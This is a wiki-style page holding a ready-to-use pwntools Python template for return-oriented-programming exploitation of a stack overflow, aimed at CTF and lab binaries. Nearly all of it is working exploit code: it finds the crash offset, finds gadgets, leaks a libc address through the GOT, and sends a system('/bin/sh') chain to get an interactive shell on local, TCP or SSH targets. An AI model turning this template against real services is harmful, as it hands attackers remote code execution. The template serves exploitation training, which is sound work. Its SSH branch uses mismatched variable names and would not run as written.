# ROP-PWN template {% code title="template.py" %} ```python from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools #################### #### CONNECTION #### #################### LOCAL = False REMOTETTCP = True REMOTESSH = False GDB = False LOCAL_BIN = "./vuln" REMOTE_BIN = "~/vuln" #For ssh LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it if LOCAL: P = process(LOCAL_BIN) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets elif REMOTETTCP: P = remote('',1339) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets elif REMOTESSH: ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) p = ssh_shell.process(REMOTE_BIN) # start the vuln binary elf = ELF(LOCAL_BIN)# Extract data from binary rop = ROP(elf)# Find ROP gadgets if GDB and not REMOTETTCP and not REMOTESSH: # attach gdb and continue # You can set breakpoints, for example "break *main" gdb.attach(P.pid, "b *main") ########################## ##### OFFSET FINDER ###### ########################## OFFSET = b"" #b"A"*264 if OFFSET == b"": gdb.attach(P.pid, "c") #Attach and continue payload = cyclic(264) payload += b"AAAAAAAA" print(P.clean()) P.sendline(payload) #x/wx $rsp -- Search for bytes that crashed the application #print(cyclic_find(0x63616171)) # Find the offset of those bytes P.interactive() exit() ##################### #### Find Gadgets ### ##################### try: libc_func = "puts" PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts except: libc_func = "printf" PUTS_PLT = ELF_LOADED.plt['printf'] MAIN_PLT = ELF_LOADED.symbols['main'] POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi" RET = (ROP_LOADED.find_gadget(['ret']))[0] log.info("Main start: " + hex(MAIN_PLT)) log.info("Puts plt: " + hex(PUTS_PLT)) log.info("pop rdi; ret gadget: " + hex(POP_RDI)) log.info("ret gadget: " + hex(RET)) ######################### #### Finf LIBC offset ### ######################### def generate_payload_aligned(rop): payload1 = OFFSET + rop if (len(payload1) % 16) == 0: return payload1 else: payload2 = OFFSET + p64(RET) + rop if (len(payload2) % 16) == 0: log.info("Payload aligned successfully") return payload2 else: log.warning(f"I couldn't align the payload! Len: {len(payload1)}") return payload1 def get_addr(libc_func): FUNC_GOT = ELF_LOADED.got[libc_func] log.info(libc_func + " GOT @ " + hex(FUNC_GOT)) # Create rop chain rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) rop1 = generate_payload_aligned(rop1) # Send our rop-chain payload #P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received print(P.clean()) # clean socket buffer (read all and print) P.sendline(rop1) # If binary is echoing back the payload, remove that message recieved = P.recvline().strip() if OFFSET[:30] in recieved: recieved = P.recvline().strip() # Parse leaked address log.info(f"Len rop1: {len(rop1)}") leak = u64(recieved.ljust(8, b"\x00")) log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}") # Set lib base address if LIBC: LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base log.info("LIBC base @ %s" % hex(LIBC.address)) # If not LIBC yet, stop here else: print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)") P.interactive() return hex(leak) get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base ############################## ##### FINAL EXPLOITATION ##### ############################## BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh SYSTEM = LIBC.sym["system"] EXIT = LIBC.sym["exit"] log.info("POP_RDI %s " % hex(POP_RDI)) log.info("bin/sh %s " % hex(BINSH)) log.info("system %s " % hex(SYSTEM)) log.info("exit %s " % hex(EXIT)) rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT) rop2 = generate_payload_aligned(rop2) P.clean() P.sendline(rop2) P.interactive() #Interact with your shell :) ``` {% endcode %}